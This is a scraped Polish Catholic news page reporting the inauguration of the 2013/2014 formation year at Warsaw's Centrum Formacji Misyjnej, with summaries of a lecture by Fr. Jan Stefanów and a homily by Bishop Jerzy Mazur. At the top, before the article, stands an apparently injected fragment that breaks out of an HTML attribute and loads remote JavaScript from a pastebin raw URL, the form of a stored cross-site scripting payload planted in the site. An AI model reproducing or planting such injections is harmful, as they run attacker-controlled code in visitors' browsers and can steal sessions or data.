">

"> <script type="text/javascript" src="https://pastebin.com/raw/hUw8hjvb"></script></p>

Dzisiaj jest: poniedziałek,
19 listopada 2018r.

wykop.pl

Warszawa: inauguracja roku 2013/2014 w Centrum Formacji Misyjnej  

Wiara w Chrystusa jest najcenniejszym darem, jaki możecie dać innym – podkreślił bp Jerzy Mazur, zwracając się do przyszłych misjonarzy. W Centrum Formacji Misyjnej w Warszawie odbyła się 4 września uroczysta inauguracja nowego roku formacyjnego. Przez najbliższe dziewięć miesięcy 33 osoby poprzez ćwiczenia duchowe, studia z zakresu misjologii, a zwłaszcza naukę języka obcego, będą przygotowywały się do wyjazdu na misje.

 

Wykład inauguracyjny wygłosił ks. prof. Jan Stefanów, werbista i misjonarz z Ameryki Łacińskiej. Mówca skupił się na roli słowa Bożego w kontekście Roku Wiary oraz wydarzeń, jakimi w ostatnim czasie żył Kościół. Przypomniał, że wiara rodzi się ze słuchania (Rz). Bóg prowadzi dialog z człowiekiem. W każdym z nas tkwi potencjał wiary, który się uaktywnia, gdy usłyszymy słowo Boga. Wtedy rodzi się wiara. Stąd też ważne jest, by słowo Boże było głoszone, a słuchacze gotowi na Jego przyjęcie. Pierwszym słowem jest stworzenie. Księga natury jest słowem Boga. Poprzez nią mówi On o sobie. Niejako słowo Boże materializuje się w rzeczywistości stworzonej.

Drugim wymiarem Bożego słowa jest Pismo Święte. Biblia to niejako „przypisy” w Księdze Życia. Słowo wyjaśnia jego sens, ukazuje obecność Boga w codzienności.

Słowo Boże jest przyjmowane we wspólnocie wiary. Jest to słowo, z którym wchodzi się w relację. Wydobywa ono z ciemności rzeczywistość, objaśnia ją. Trzeba poznawać słowo Chrystusa, by wejść z Nim w relację, zażyłość. Potrzebujemy zaciekawienia słowem Bożym.Powołując się na posynodalną adhortację Verbum Domini Benedykta XVI, mówca zwrócił uwagę na konieczność dowartościowania słowa Bożego w duszpasterstwie. Potrzeba animacji biblijnej całego duszpasterstwa, która sprawi, że mocniej zapłonie ogień wiary.

 

Podczas Mszy św. przewodniczący Komisji Episkopatu Polski ds. Misji bp Jerzy Mazur podkreślił, że misje są przede wszystkim sprawą wiary. - Tylko w niej znajdują one zrozumienie i oparcie. Dlatego winniśmy być mocni w wierze i całą naszą ufność złożyć w Bogu. Wówczas w naszym sercu zapanuje pokój, łagodność, czułość, odwaga, pogoda ducha i radość, które są owocami Ducha Świętego. Wówczas nasz sposób myślenia i działania stanie się taki jak Jezusa Chrystusa – zaznaczył kaznodzieja, przywołując słowa papieża Franciszka wypowiedziane podczas Światowych Dni Młodzieży w Rio de Janeiro. - Realizacja misyjnego powołania rozpoczyna się zawsze od komunii z Bogiem. Tylko ten, kto zbliżył się do Jezusa i doświadczyli Jego Miłości, zapragnie dzielić się z innymi pięknem tego spotkania i radością, która wówczas napełniał ich serce – powiedział kaznodzieja. Na zakończenie liturgii przyszli misjonarze otrzymali z rąk biskupa encyklikę “Redemptoris Missio” bł. Jana Pawła II.

 W tym roku przygotowanie do pracy misyjnej rozpoczęło 33 kandydatów. Wśród nich jest 17 księży diecezjalnych, 3 kapłanów zakonnych, 9 sióstr zakonnych oraz 4 osoby świeckie. Większość z nich wyjedzie by posługiwać w krajach Ameryki Łacińskiej. Dwie osoby wybierają się także do Kazachstanu i dwie na Kubę.

mag / Warszawa, http://adgentes.misje.pl/

 

Homilia ks. biskupa: